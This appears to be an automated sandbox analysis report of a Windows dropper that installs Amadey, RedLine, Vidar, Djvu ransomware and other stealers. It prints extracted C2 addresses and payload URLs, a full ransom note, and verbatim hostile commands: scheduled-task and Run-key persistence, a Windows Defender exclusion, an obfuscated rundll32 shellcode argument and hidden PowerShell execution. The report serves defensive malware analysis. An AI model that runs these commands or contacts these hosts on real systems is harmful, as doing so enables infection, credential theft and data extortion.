Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
31-01-2023 15:21
General
-
Target
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe
-
Size
235KB
-
MD5
67bb41448f41511e169c83230d7e9486
-
SHA1
dde5a6577a966a9e8713e66ad7ef50b840dd114e
-
SHA256
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914da4e04aee13df10007b
-
SHA512
84baf5659cee4e55f48ea0523e2f30c5c6d696d5881da7f628cb4450f1dfc949396ee48cbded60dc98b53483aeb5cdf7fbe4970ab612049356185f2aadf02d84
-
SSDEEP
6144:ILUoeyDABOdDubDXqgraG0JzSRuVyL+VY9QqgE:Ilu0LgwJ4uVyaVgJ
Malware Config
Extracted
amadey
3.66
62.204.41.72/hn85jlUn/index.php
62.204.41.88/9vdVVVjsw/index.php
Extracted
redline
druid
62.204.41.170:4132
-
auth_value
fddcb4126f1d0ea4ac975511b3530e72
Extracted
redline
new1
176.113.115.16:4122
-
auth_value
ac44cbde6633acc9d67419c7278d5c70
Extracted
redline
temp45645645
82.115.223.9:15486
-
auth_value
f7fe7a35c673cce3fa35569cf455f570
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
djvu
http://drampik.com/raud/get.php
-
extension
.assm
-
offline_id
ex4uvTKsM2vEkIcr3MjXi2C6v27h1mS682iUXGt1
-
payload_url
http://uaery.top/dl/build2.exe
http://drampik.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-wY6g3rkhZz Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0638JOsie
Extracted
vidar
2.3
19
https://t.me/mantarlars
https://steamcommunity.com/profiles/76561199474840123
-
profile_id
19
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Detect rhadamanthys stealer shellcode 5 IoCs
-
Detected Djvu ransomware 7 IoCs
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 16 IoCs
-
Modifies security service 2 TTPs 5 IoCs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 14 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Blocklisted process makes network request 5 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 41 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 14 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 3 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 30 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 39 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 8 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe"C:\Users\Admin\AppData\Local\Temp\f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5eb6b96734" /P "Admin:N"&&CACLS "..\5eb6b96734" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:R" /E5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000001001\moda.exe"C:\Users\Admin\AppData\Local\Temp\1000001001\moda.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000002001\trena1.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\trena1.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000003051\druid1.exe"C:\Users\Admin\AppData\Local\Temp\1000003051\druid1.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000004051\nitka.exe"C:\Users\Admin\AppData\Local\Temp\1000004051\nitka.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 12325⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000005001\moda1.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\moda1.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000006051\druid.exe"C:\Users\Admin\AppData\Local\Temp\1000006051\druid.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000007001\nitka1.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\nitka1.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 20685⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000008001\lebro.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\lebro.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\9e0894bcc4" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\9e0894bcc4" /P "Admin:R" /E7⤵
-
C:\Users\Admin\AppData\Local\Temp\1000043001\OwvtknErB0Wl.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\OwvtknErB0Wl.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 12807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 12887⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000051001\Player3.exe"C:\Users\Admin\AppData\Local\Temp\1000051001\Player3.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E9⤵
-
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe" -h9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main8⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main9⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4280 -s 68010⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe"C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exe"C:\Users\Admin\AppData\Roaming\nsis_unse5708f9.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8Gn7AHMfAEwAdQBX|wBIADEAOAB4vh8ATQBJAEEtAln|SIPsKOgEAgD|AEiDxCjDzMz|zEyJRCQYSIn|VCQQSIlMJAj+XQFIi0QkMEiJ2wQkgQE4SG8ACEhvx0QkEC0B6w6BAV8QSIPAAY8BEIEBt0BIOZYAcyWfA4v|DCRIA8hIi8HXSItMqwFUewAD0f9Ii8qKCYgI6|3BZgVlSIsEJWD+8|AzyUiLUBhI|zvRdDZIg8Ig|0iLAkg7wnQq|2aDeEgYdRpM|4tAUGZBgzhru3QHERFLdQgREHj|EC50BUiLAOuv1UiLSP0AwWoAQP9TVVZXQVRBVe9BVkFXXQFmgTn|TVpNi|hMi|K|SIvZD4X88|BM|2NJPEGBPAlQv0UAAA+F6vPwQe+LhAmI8|CFwEi|jTwBD4TWahGDd7wJjC0BD4TH8|D|RItnIESLXxz|i3ckRItPGEz|A+FMA9lIA|H|M8lFhckPhKT+8|BNi8RBixBF|zPSSAPTigKE|8B0HUHByg0Pe77A+gABRAPQvxH|dexBgfqq|A3|fHQOg8EBSYP|wARBO8lzaev|xovBD7cMTkX|iyyLTAPrdFj7M+2qEHRRQYsU|sEA0zPJigJMi9|C6w|BycgRA8je5RABQYoA1RDtM3|AM|ZBOwy24BD+pgCDxgGD+Ahy|+7rCkiLy0H|f9VJiQT3g8XkEH|EBDtvGHKvZgH|QV9BXkFdQVzvX15dWzMXSIHs+2ABZACL6ehm|v|||0iFwA+EmNZ1IEyNrwGLKxDIM|f|6Jt9II1fBEz|jUVGM9KLy||3VCRogCBMi+AP64RrdSBFqBAzwIt905EgSIl8JCCmIP1wgCBIi|APhEv8dSCmIFBIjVYIRH+NR0BIjYwkhRG|SIvY6Hz9fiCNq1ZI3iAQ4iHM8|Do|WfvIESLBo1XCPRBIKYgWMohiYQkgNqHEt7z8IsO2iBYiWOMJHERBzCRIOgx7yD7i5wtMkyLXTpI74P7bEiKIDBMib9kJDhMi6QaMky7iVyEAYQk3IcRhu2SjRGNR0swjCTwfvPwSYvU6On8BTC7ipx4MkiNhHgyQf+A8yGNT2xEMP0YpAKD6QF184H9vHgyIVJleHVN74uEJPQiMZQk+P41AcJIO9hyOIP|+mx2M0SNSUCe+gCUQbgAmACmIECeyiL4dBlEtjDAMUnvjVQkbJEgSYPod2zoa4IwSIvOpiD|eEiF|3QSi1XzQkyOMBsxSI1MJD9A|9dIgcR0IWEkAC0ILQE=7⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2948 -s 2968⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 7087⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000090001\uplagin.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\uplagin.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SETUP_33455\Engine.exeC:\Users\Admin\AppData\Local\Temp\SETUP_33455\Engine.exe /TH_ID=_1772 /OriginExe="C:\Users\Admin\AppData\Local\Temp\1000090001\uplagin.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\CmD.exeC:\Windows\system32\CmD.exe /c cmd < 808⤵
-
C:\Windows\SysWOW64\cmd.execmd9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell get-process avastui10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell get-process avgui10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\certutil.execertutil -decode 5 5fbHlM10⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^BYLhzgJfvHMGFGbkIYAzlXUMcmgLOfzNNBjXWVOwahotMobsaoVUFcQEtYSUZYBuhYTtzmgNlmwWOQZjwXaFxnosKI$" 5fbHlM10⤵
-
C:\Users\Admin\AppData\Local\Temp\q25jy1i2.aam\18931\Russian.exe.pif18931\\Russian.exe.pif 18931\\N10⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\q25jy1i2.aam\18931\Russian.exe.pif" & exit11⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 612⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 1810⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\a7e592f1-b46b-45d4-965a-f2891e354357" /deny *S-1-1-0:(OI)(CI)(DE,DC)8⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe" --Admin IsNotAutoStart IsNotTask8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe" --Admin IsNotAutoStart IsNotTask9⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe"C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe"C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe"11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 162012⤵
- Program crash
-
C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build3.exe"C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build3.exe"10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000119001\jn-17L.exe"C:\Users\Admin\AppData\Local\Temp\1000119001\jn-17L.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -windowstyle hidden -file "C:\Users\Admin\AppData\Local\Temp\xtt8wcvtp7dg8v5p6khamra6v9xtaykn.ps1"7⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000122001\LummaC2.exe"C:\Users\Admin\AppData\Local\Temp\1000122001\LummaC2.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe"C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 19927⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main6⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main7⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3512 -s 6848⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\1000009001\fular.exe"C:\Users\Admin\AppData\Local\Temp\1000009001\fular.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000010001\fular1.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\fular1.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 12325⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000011001\vina.exe"C:\Users\Admin\AppData\Local\Temp\1000011001\vina.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1000012000\vina1.exe"C:\Users\Admin\AppData\Roaming\1000012000\vina1.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\9308.exeC:\Users\Admin\AppData\Local\Temp\9308.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll,start3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 237714⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 5483⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
